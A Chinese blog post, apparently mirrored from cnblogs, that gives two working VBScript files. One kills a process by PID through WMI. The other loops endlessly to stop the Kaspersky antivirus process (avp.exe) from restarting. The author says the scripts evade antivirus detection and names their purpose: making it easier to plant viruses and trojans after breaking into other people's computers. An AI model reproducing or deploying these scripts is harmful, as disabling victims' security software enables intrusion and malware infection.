zoukankan      html  css  js  c++  java
  • 两个简易VBS脚本结束进程与防止进程启动

    今天下午没课,躲进私人空间开始思考些问题。在浏览VBS相关案例时,自己写了两个小程序出来,有Hack性质的(其实只要能“借刀杀人”,什么软件黑客性质?- -!)。Kill.vbs用来在cmd下结束进程,Dis.vbs用来在窗口模式下防止某进程再次启动。这两个VBS都不会被杀毒软件KILL掉,并且有一定的隐蔽性……看代码!('为注释)
      Kill.vbs:
      for each ps in getobject _
      ("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术,我不能解释清楚!
      if ps.handle=wscript.arguments(0) then  '判断进程的PID号是否与获得的PID号参数相等
      wscript.echo ps.terminate '如果相等就结束指定PID号对应的进程
      end if
      next
      Dis.vbs
      dim y,x '不要这行也行……
      do '来个死循环……一直在判断!do ... loop内为循环体!
      set y=getobject("winmgmts:\\.\root\cimv2") '和上面解释一样,这也是涉及到微软的WMI技术!
      set x=y.execquery("select * from win32_process where name='avp.exe'")
      '查询语句,where后判断avp.exe(卡巴)是否存在进程中!
      '这样当卡巴被上面的Kill.vbs结束时就再也启动不起来了。除非,把Dis.vbs结束了先……
      for each i in x
      i.terminate()  '卡巴要启动马上就终止……
      next
      wscript.sleep
      loop
      解释够清楚了,那就来看看这两个vbs是如何工作的吧。我将Kill.vbs与Dis.vbs放在C盘根目录下。
      打开cmd,输入cd\回到C盘根目录下,输入tasklist查看当前系统的 进程情况,然后记下你想kill的进程的PID号,输入cscript Kill.vbs 2200即可结束PID为2200的进程了!假如这个进程是avp.exe,那你就可以输入Dis.vbs启动Dis.vbs来防止卡巴继续被启动。 Dis.vbs启动时仅在任务管理器的进程中有wscript.exe进程项,要是不结束这个进程是无法再次启动卡巴的。
      懂得这些,为以后入侵他人电脑后上传病毒、木马之类的就更方便了一点点……上面的所有过程都经本人试验成功了,继续完善……
  • 相关阅读:
    es5预览本地文件、es6练习代码演示案例
    Java实现 LeetCode 838 推多米诺(暴力模拟)
    Java实现 LeetCode 838 推多米诺(暴力模拟)
    Java实现 LeetCode 838 推多米诺(暴力模拟)
    Java实现 LeetCode 837 新21点(DP)
    Java实现 LeetCode 837 新21点(DP)
    Java实现 LeetCode 837 新21点(DP)
    Java实现 LeetCode 836 矩形重叠(暴力)
    Subversion under Linux [Reprint]
    Subversion how[Reprint]
  • 原文地址:https://www.cnblogs.com/top5/p/1604723.html
Copyright © 2011-2022 走看看